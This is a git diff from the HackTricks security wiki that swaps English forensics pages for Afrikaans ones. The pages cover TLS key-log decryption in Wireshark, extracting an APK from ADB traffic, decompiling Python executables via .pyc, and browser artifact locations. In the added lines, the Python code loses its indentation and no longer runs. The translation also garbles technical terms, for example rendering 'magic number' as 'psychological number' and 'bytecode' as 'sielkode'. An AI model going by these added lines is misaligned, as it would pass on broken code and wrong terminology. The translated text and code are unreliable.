Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). +Beide Firefox en Chrome het die vermoë om TLS-sessiesleutels te log, wat met Wireshark gebruik kan word om TLS-verkeer te ontsleutel. Dit maak diepgaande analise van veilige kommunikasie moontlik. Meer besonderhede oor hoe om hierdie ontsleuteling uit te voer, is te vinde in 'n gids by [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). -To detect this search inside the environment for to variable `SSLKEYLOGFILE` +Om dit op te spoor, soek binne die omgewing na die veranderlike `SSLKEYLOGFILE` -A file of shared keys will look like this: +'n Lêer van gedeelde sleutels sal so lyk: ![](<../../../.gitbook/assets/image (99).png>) -To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename: +Om dit in Wireshark in te voer, gaan na \_edit > preference > protocol > ssl > en voer dit in (Pre)-Master-Secret log filename: ![](<../../../.gitbook/assets/image (100).png>) -## ADB communication - -Extract an APK from an ADB communication where the APK was sent: +## ADB-kommunikasie +Onttrek 'n APK uit 'n ADB-kommunikasie waar die APK gestuur is: ```python from scapy.all import * pcap = rdpcap("final2.pcapng") def rm_data(data): - splitted = data.split(b"DATA") - if len(splitted) == 1: - return data - else: - return splitted[0]+splitted[1][4:] +splitted = data.split(b"DATA") +if len(splitted) == 1: +return data +else: +return splitted[0]+splitted[1][4:] all_bytes = b"" for pkt in pcap: - if Raw in pkt: - a = pkt[Raw] - if b"WRTE" == bytes(a)[:4]: - all_bytes += rm_data(bytes(a)[24:]) - else: - all_bytes += rm_data(bytes(a)) +if Raw in pkt: +a = pkt[Raw] +if b"WRTE" == bytes(a)[:4]: +all_bytes += rm_data(bytes(a)[24:]) +else: +all_bytes += rm_data(bytes(a)) print(all_bytes) f = open('all_bytes.data', 'w+b') f.write(all_bytes) f.close() ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index 7c180fcf8..d5199a752 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -1,89 +1,78 @@ -# Decompile compiled python binaries (exe, elf) - Retreive from .pyc +# Ontkompilering van gekompileerde Python-binêre (exe, elf) - Herwin vanaf .pyc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## From Compiled Binary to .pyc - -From an **ELF** compiled binary you can **get the .pyc** with: +## Vanaf Gekompileerde Binêre na .pyc +Vanaf 'n **ELF** gekompileerde binêre kan jy die **.pyc** kry met: ```bash pyi-archive_viewer # The list of python modules will be given here: [(0, 230, 311, 1, 'm', 'struct'), - (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), - (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), - (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), - (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), - (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), - (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), - (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), - (15090, 445, 672, 1, 's', 'pyi_rth_inspect'), - (15535, 2514, 4421, 1, 's', 'binary_name'), +(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), +(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), +(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), +(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), +(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), +(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), +(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), +(15090, 445, 672, 1, 's', 'pyi_rth_inspect'), +(15535, 2514, 4421, 1, 's', 'binary_name'), ... ? X binary_name to filename? /tmp/binary.pyc ``` - -In a **python exe binary** compiled you can **get the .pyc** by running: - +In 'n **python exe binêre** wat gekompileer is, kan jy die .pyc kry deur die volgende uit te voer: ```bash python pyinstxtractor.py executable.exe ``` +## Van .pyc na Python-kode -## From .pyc to python code - -For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**: - +Vir die **.pyc**-data ("gekompileerde" Python) moet jy begin om te probeer om die **oorspronklike** **Python**-kode te **onttrek**: ```bash uncompyle6 binary.pyc > decompiled.py ``` +**Maak seker** dat die binêre lêer die **uitbreiding** "**.pyc**" het (as dit nie die geval is nie, sal uncompyle6 nie werk nie) -**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work) - -While executing **uncompyle6** you might find the **following errors**: - -### Error: Unknown magic number 227 +Terwyl jy **uncompyle6** uitvoer, mag jy die **volgende foute** teëkom: +### Fout: Onbekende magiese nommer 227 ```bash /kali/.local/bin/uncompyle6 /tmp/binary.pyc Unknown magic number 227 in /tmp/binary.pyc ``` +Om dit reg te stel, moet jy die korrekte "magic number" by die begin van die gegenereerde lêer voeg. -To fix this you need to **add the correct magic number** at the beginning of the generated file. - -**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute: - +"Magic numbers" verskil met die Python-weergawe, om die "magic number" van Python 3.8 te kry, moet jy 'n Python 3.8-terminal oopmaak en die volgende uitvoer: ``` >> import imp >> imp.get_magic().hex() '550d0d0a' ``` +Die **sielkundige nommer** in hierdie geval vir python3.8 is **`0x550d0d0a`**, dan, om hierdie fout reg te stel, sal jy nodig hê om dit by die **begin** van die **.pyc-lêer** die volgende bytes by te voeg: `0x0d550a0d000000000000000000000000` -The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000` - -**Once** you have **added** that magic header, the **error should be fixed.** - -This is how a correctly added **.pyc python3.8 magic header** will look like: +**Sodra** jy daardie sielkundige kop bygevoeg het, behoort die **fout reggestel te wees.** +So lyk 'n korrek bygevoegde **.pyc python3.8 sielkundige kop**: ```bash hexdump 'binary.pyc' | head 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000 @@ -91,28 +80,26 @@ hexdump 'binary.pyc' | head 0000020 0700 0000 4000 0000 7300 0132 0000 0064 0000030 0164 006c 005a 0064 0164 016c 015a 0064 ``` +### Fout: Decompiling generiese foute -### Error: Decompiling generic errors +**Ander foute** soos: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` kan voorkom. -**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear. +Dit beteken waarskynlik dat jy die **sielkundige nommer nie korrek bygevoeg het nie** of dat jy nie die **korrekte sielkundige nommer gebruik het nie**, so maak **seker dat jy die korrekte een gebruik** (of probeer 'n nuwe een). -This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one). +Kyk na die vorige foutdokumentasie. -Check the previous error documentation. +## Outomatiese hulpmiddel -## Automatic Tool +Die **[python-exe-unpacker-hulpmiddel](https://github.com/countercept/python-exe-unpacker)** dien as 'n kombinasie van verskeie gemeenskapsbeskikbare hulpmiddels wat ontleders help om uitvoerbare lêers wat in Python geskryf is, te ontleed en te dekompilieer, spesifiek dié wat met py2exe en pyinstaller geskep is. Dit sluit YARA-reëls in om te identifiseer of 'n uitvoerbare lêer op Python gebaseer is en bevestig die skeppingstool. -The **[python-exe-unpacker tool](https://github.com/countercept/python-exe-unpacker)** serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool. +### ImportError: Lêernaam: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' bestaan nie -### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist - -A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process. - -Example of the issue: +'n Algemene probleem wat ondervind word, behels 'n onvolledige Python-sielkode-lêer as gevolg van die **ontpakkingsproses met unpy2exe of pyinstxtractor**, wat dan **nie deur uncompyle6 erken word nie as gevolg van 'n ontbrekende Python-sielkode-weergawe-nommer**. Om dit aan te spreek, is 'n voorvoegselopsie bygevoeg wat die nodige Python-sielkode-weergawe-nommer byvoeg en die dekompilasieproses vergemaklik. +Voorbeeld van die probleem: ```python # Error when attempting to decompile without the prepend option -test@test: uncompyle6 unpacked/malware_3.exe/archive.py +test@test: uncompyle6 unpacked/malware_3.exe/archive.py Traceback (most recent call last): ... ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist @@ -127,11 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive # Successfully decompiled file [+] Successfully decompiled. ``` +## Analiseer Python-samestelling -## Analyzing python assembly - -If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2: - +As jy nie in staat was om die oorspronklike Python-kode te onttrek nie volgens die vorige stappe, kan jy probeer om die samestelling te onttrek (maar dit is nie baie beskrywend nie, so probeer weer om die oorspronklike kode te onttrek). Ek het 'n baie eenvoudige kode gevind om die _.pyc_ binêre kode te ontbind (sterkte met die verstaan van die kodevloei) [hier](https://bits.theorem.co/protecting-a-python-codebase/). As die _.pyc_ van Python2 afkomstig is, gebruik Python2: ```bash >>> import dis >>> import marshal @@ -157,34 +142,32 @@ True >>> >>> # Disassemble the code object >>> dis.disassemble(code) - 1 0 LOAD_CONST 0 () - 3 MAKE_FUNCTION 0 - 6 STORE_NAME 0 (hello_world) - 9 LOAD_CONST 1 (None) - 12 RETURN_VALUE +1 0 LOAD_CONST 0 () +3 MAKE_FUNCTION 0 +6 STORE_NAME 0 (hello_world) +9 LOAD_CONST 1 (None) +12 RETURN_VALUE >>> >>> # Also disassemble that const being loaded (our function) >>> dis.disassemble(code.co_consts[0]) - 2 0 LOAD_CONST 1 ('Hello {0}') - 3 LOAD_ATTR 0 (format) - 6 LOAD_FAST 0 (name) - 9 CALL_FUNCTION 1 - 12 PRINT_ITEM - 13 PRINT_NEWLINE - 14 LOAD_CONST 0 (None) - 17 RETURN_VALUE +2 0 LOAD_CONST 1 ('Hello {0}') +3 LOAD_ATTR 0 (format) +6 LOAD_FAST 0 (name) +9 CALL_FUNCTION 1 +12 PRINT_ITEM +13 PRINT_NEWLINE +14 LOAD_CONST 0 (None) +17 RETURN_VALUE ``` +## Python na Uitvoerbare lêer -## Python to Executable +Om te begin, gaan ons jou wys hoe ladingstukke gekompileer kan word in py2exe en PyInstaller. -To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller. - -### To create a payload using py2exe: - -1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org) -2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe. -3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2. +### Om 'n ladingstuk te skep met behulp van py2exe: +1. Installeer die py2exe-pakket vanaf [http://www.py2exe.org/](http://www.py2exe.org) +2. Vir die ladingstuk (in hierdie geval noem ons dit hello.py), gebruik 'n skripsie soos die een in Figuur 1. Die opsie "bundle\_files" met die waarde van 1 sal alles insluitend die Python-tolk in een uitvoerbare lêer saamvoeg. +3. Sodra die skripsie gereed is, sal ons die opdrag "python setup.py py2exe" uitreik. Dit sal die uitvoerbare lêer skep, net soos in Figuur 2. ```python from distutils.core import setup import py2exe, sys, os @@ -192,10 +175,10 @@ import py2exe, sys, os sys.argv.append('py2exe') setup( - options = {'py2exe': {'bundle_files': 1}}, - #windows = [{'script': "hello.py"}], - console = [{'script': "hello.py"}], - zipfile = None, +options = {'py2exe': {'bundle_files': 1}}, +#windows = [{'script': "hello.py"}], +console = [{'script': "hello.py"}], +zipfile = None, ) ``` @@ -212,12 +195,10 @@ running py2exe copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe ``` +### Om 'n payload te skep met behulp van PyInstaller: -### To create a payload using PyInstaller: - -1. Install PyInstaller using pip (pip install pyinstaller). -2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable. - +1. Installeer PyInstaller met behulp van pip (pip install pyinstaller). +2. Daarna sal ons die opdrag "pyinstaller --onefile hello.py" uitreik (let wel dat 'hello.py' ons payload is). Dit sal alles saamvoeg in een uitvoerbare lêer. ``` C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 108 INFO: PyInstaller: 3.3.1 @@ -230,27 +211,26 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe 6325 INFO: Building EXE from out00-EXE.toc completed successfully. ``` - -## References +## Verwysings * [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 709547f0d..70fc4338f 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,21 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-Here you can find interesting tricks for specific file-types and/or software: +Hier kan jy interessante truuks vir spesifieke lêertipes en/of sagteware vind: {% page-ref page=".pyc.md" %} @@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1db184503..be835bfbf 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -1,80 +1,80 @@ -# Browser Artifacts +# Blaaier Artefakte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Browsers Artifacts +## Blaaier Artefakte -Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. +Blaaier artefakte sluit verskillende soorte data in wat deur webblaaier gestoor word, soos navigasiegeskiedenis, bladmerke en kasdata. Hierdie artefakte word in spesifieke lêers binne die bedryfstelsel gehou, wat verskil in ligging en naam oor blaaier, maar oor die algemeen soortgelyke datatipes stoor. -Here's a summary of the most common browser artifacts: +Hier is 'n opsomming van die mees algemene blaaier artefakte: -- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites. -- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history. -- **Bookmarks**: Sites saved by the user for quick access. -- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user. -- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis. -- **Logins**: Stored login credentials. -- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits. -- **Browser Sessions**: Data related to open browser sessions. -- **Downloads**: Records of files downloaded through the browser. -- **Form Data**: Information entered in web forms, saved for future autofill suggestions. -- **Thumbnails**: Preview images of websites. -- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary. +- **Navigasiegeskiedenis**: Hou by watter webwerwe die gebruiker besoek het, nuttig om besoeke aan skadelike webwerwe te identifiseer. +- **Outomatiese voltooiingsdata**: Voorstelle gebaseer op gereelde soektogte, bied insigte wanneer dit gekombineer word met navigasiegeskiedenis. +- **Bladmerke**: Webwerwe wat deur die gebruiker gestoor is vir vinnige toegang. +- **Uitbreidings en Byvoegings**: Blaaieruitbreidings of byvoegings wat deur die gebruiker geïnstalleer is. +- **Kas**: Stoor webinhoud (bv. beelde, JavaScript-lêers) om webwerflaaitye te verbeter, waardevol vir forensiese analise. +- **Aantekeninge**: Gestoorde aanmeldingslegitimasie. +- **Favicons**: Ikone wat met webwerwe geassosieer word en in blaaierblaaie en bladmerke verskyn, nuttig vir addisionele inligting oor gebruikersbesoeke. +- **Blaaier-sessies**: Data wat verband hou met oop blaaier-sessies. +- **Aflaaiers**: Rekords van lêers wat deur die blaaier afgelaai is. +- **Vormdata**: Inligting wat in webvorms ingevoer is en gestoor word vir toekomstige outomatiese voltooiingsvoorstelle. +- **Duimnaels**: Voorskou-afbeeldings van webwerwe. +- **Custom Dictionary.txt**: Woorde wat deur die gebruiker by die blaaier se woordeboek gevoeg is. ## Firefox -Firefox organizes user data within profiles, stored in specific locations based on the operating system: +Firefox organiseer gebruikersdata binne profiele, wat in spesifieke liggings volgens die bedryfstelsel gestoor word: - **Linux**: `~/.mozilla/firefox/` - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/` - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\` -A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted. +'n `profiles.ini`-lêer binne hierdie gidslys die gebruikersprofiele. Elke profiel se data word in 'n vouer gestoor wat genoem word in die `Path`-veranderlike binne `profiles.ini`, wat in dieselfde gids as `profiles.ini` self geleë is. As 'n profiel se vouer ontbreek, is dit moontlik uitgevee. -Within each profile folder, you can find several important files: +Binne elke profielvouer kan jy verskeie belangrike 